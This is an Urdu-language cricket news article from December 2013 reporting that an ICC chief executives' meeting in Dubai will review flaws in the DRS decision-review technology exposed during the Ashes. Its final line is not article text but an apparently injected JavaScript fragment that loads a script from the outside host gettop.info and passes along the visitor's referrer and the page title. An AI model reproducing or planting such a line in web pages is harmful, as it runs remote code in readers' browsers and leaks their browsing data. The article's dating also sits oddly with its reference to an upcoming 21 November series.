Published On: Wed, Dec 11th, 2013
Published in Category: Uncategorized

آئی سی سی میٹنگ: ڈی آر ایس سسٹم موضوع بحث ہوگا

Share This
Tags

دبئی: آئی سی سی کی چیف ایگزیکٹیوز میٹنگ میں ڈی آر ایس سسٹم موضوع بحث ہوگا، ایشز سیریز میں سامنے آنے والے ٹیکنالوجی کے نقائص کا جائزہ لیا جائیگا۔

سسٹم کی افادیت بڑھانے کیلیے مختلف تجاویز بھی زیر غور آئینگی۔ تفصیلات کے مطابق انگلینڈ اور آسٹریلیا کے درمیان گذشتہ دنوں کھیلی جانے والی ایشز سیریز میں ڈی آر ایس کے کئی نقائص کھل کر سامنے آئے جس کی وجہ سے میچز پر تنازعات کے بادل چھائے رہے، دونوں ملکوں نے کونسل سے شکایت کی کہ ڈی آر ایس نے تاریخی ایشز سیریز کو ہائی جیک کرلیا، اگرچہ دونوں ہی سسٹم کے حامی مگر بہتری کے بھی خواہاں ہیں، اب اس تمام معاملے کا آئی سی سی چیف ایگزیکٹیوز میٹنگز میں جائزہ لیا جائے گا جو آئندہ پیر اور منگل کو دبئی میں ہونگی۔
ایجنڈے میں ڈی آر ایس کا معاملہ شامل اور ایشز میں ٹیکنالوجی کی سامنے آنیوالی خامیوں اور اسے مزید بہتر بنانے کا جائزہ لیا جائے گا، البتہ یہ یقینی طور پر نہیں کہا جاسکتا کہ برسبین میں 21 نومبر سے شروع ہونے والی جوابی ایشز سیریز سے قبل یہ عمل مکمل ہوجائیگا یا نہیں۔
s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;